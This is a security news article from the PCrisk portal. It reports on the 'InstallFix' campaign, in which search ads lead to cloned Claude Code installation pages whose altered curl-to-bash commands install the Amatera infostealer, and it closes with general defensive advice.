Fake Claude Code Installation Guides Deliver Amatera
Cybercriminals are increasingly exploiting the popularity of AI development tools to distribute malware through sophisticated social engineering campaigns. Security researchers recently uncovered a new attack technique, InstallFix, that leverages fake installation guides for popular command-line tools to trick victims into running malicious commands.
The campaign specifically targets users searching for installation instructions for Claude Code, an AI-powered command-line coding assistant developed by Anthropic. Instead of installing the legitimate tool, victims inadvertently deploy infostealer malware on their systems.
The attack demonstrates how cybercriminals refine techniques to exploit developer workflows. By closely mimicking legitimate documentation and leveraging search engine ads, attackers increase the odds that users will execute malicious code, often without suspicion. InstallFix signals an urgent intersection of social engineering, developer tools, and malware-as-a-service ecosystems.
The InstallFix technique represents an evolution of the ClickFix social engineering strategy, which typically manipulates victims into running commands under the guise of fixing technical issues. In the InstallFix variant, attackers eliminate the need for a troubleshooting scenario. Instead, the attack targets users who are actively attempting to install software.
Security researchers discovered that attackers create nearly identical clones of legitimate software installation pages. These replicas reproduce the visual design, navigation elements, and documentation structure of the official site. The only significant difference lies in the installation commands themselves, which have been altered to download malware from attacker-controlled infrastructure rather than legitimate sources.
The approach leverages a practice among developers known as "curl-to-bash" installation. In this method, users enter a command in their terminal using the "curl" tool to download data from the internet, and the data is immediately passed to the "bash" shell for execution. This simple installation process is widely used in developer tools and package managers. However, it assumes the downloaded code comes from a trusted source, creating a risk if attackers change the destination.
Attackers exploit this behavior by replacing legitimate scripts with malicious ones. If a user copies and executes the modified command, the attacker can run arbitrary code on the victim's system.
As documented by Push Security, distribution is a critical component of the InstallFix campaign. Rather than relying on phishing emails or compromised websites, attackers promote their fake installation pages through malicious search engine advertisements. When users search for terms such as "Claude Code install" or "Claude Code CLI," the malicious pages appear as sponsored results at the top of search listings.
This approach significantly increases the likelihood of successful compromise because users often trust results that appear prominently in search engines. Many individuals assume sponsored results are vetted or associated with official vendors. In reality, the advertisements direct victims to lookalike domains hosting cloned documentation pages.
Researchers observed cloned sites mirroring legitimate instructions, branding, and navigation. Most links redirect to the real Claude Code site, further reinforcing authenticity. Victims may remain unaware of compromise after following malicious instructions.
The Amatera Stealer Payload
The primary malware delivered in the InstallFix campaign is Amatera Stealer, an emerging infostealer family believed to be derived from the earlier ACR Stealer malware. The malware is often distributed through a malware-as-a-service (MaaS) model, allowing cybercriminals to subscribe to the platform and deploy it in their own campaigns.
Once installed, Amatera targets browser-stored credentials, cookies, session tokens, cryptocurrency wallet data, system information, and authentication tokens that can enable account takeover.
The malware communicates with command-and-control infrastructure using techniques designed to evade detection. In some cases, it leverages legitimate content delivery networks or trusted cloud platforms to host malicious components. Researchers observed that campaign infrastructure is hosted on services such as Cloudflare Pages, Squarespace, and Tencent EdgeOne, making it more difficult to block malicious activity.
For users on Apple's macOS operating system, the malicious command usually contains code encoded in base64. When this code runs, it downloads and runs the infostealer program. On Windows, hackers use a legitimate Windows program, mshta.exe—a tool designed to run web-based applications—to fetch and launch the malware from an attacker's server.
These variations enable attackers to target multiple operating systems while maintaining a consistent social engineering lure.
Developers are prime InstallationFix targets because they often use command-line tools and automated scripts—making them especially vulnerable to deceptive installation processes.
Developers often trust and copy commands without checking scripts, lowering the barrier to compromise if attackers replace legitimate instructions with malicious ones, giving them access to system privileges.
Several factors amplify the risk:
- The rapid adoption of AI-powered development tools is attracting a wider audience, including less experienced users.
- Installation instructions often encourage quick copy-and-paste commands for convenience.
- The visual similarity between legitimate and malicious documentation pages makes detection difficult.
Researchers warn that these dynamics create an expanding attack surface. As AI coding tools and developer platforms gain mainstream popularity, attackers can increasingly target non-technical users who lack the experience to identify suspicious installation instructions.
The InstallFix campaign reflects a broader trend in which attackers increasingly target developer ecosystems and AI tooling environments. As the software development landscape evolves, cybercriminals recognize that developer workflows provide efficient pathways to compromise high-value targets.
By exploiting trusted installation practices and manipulating search engine results, threat actors can infiltrate systems without exploiting traditional vulnerabilities. Instead, they rely on users themselves to execute malicious code.
Security researchers warn that the technique will likely expand as new developer tools gain popularity. Every widely adopted platform represents an opportunity for attackers to replicate the InstallFix model and distribute malware to a growing user base.
For organizations, InstallFix underscores the need to monitor browser threats, enforce secure development practices, and educate users to avoid blindly executing commands. Defending against such threats requires vigilance at the intersection of user behavior, developer tools, and endpoint security.
Share:
Facebook
X.com
LinkedIn
Copy Link
Karolis Liucveikis
Experienced software engineer, passionate about behavioral analysis of malicious apps
Author and general operator of PCrisk's News and Removal Guides section. Co-researcher working alongside Tomas to discover the latest threats and global trends in the cyber security world. Karolis has experience of over 8 years working in this branch. He attended Kaunas University of Technology and graduated with a degree in Software Development in 2017. Extremely passionate about technical aspects and behavior of various malicious applications.
PCrisk security portal is brought by a company RCS LT.
Joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.
Our malware removal guides are free. However, if you want to support us you can send us a donation.
DonatePCrisk security portal is brought by a company RCS LT.
Joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.
Our malware removal guides are free. However, if you want to support us you can send us a donation.
Donate
▼ Show Discussion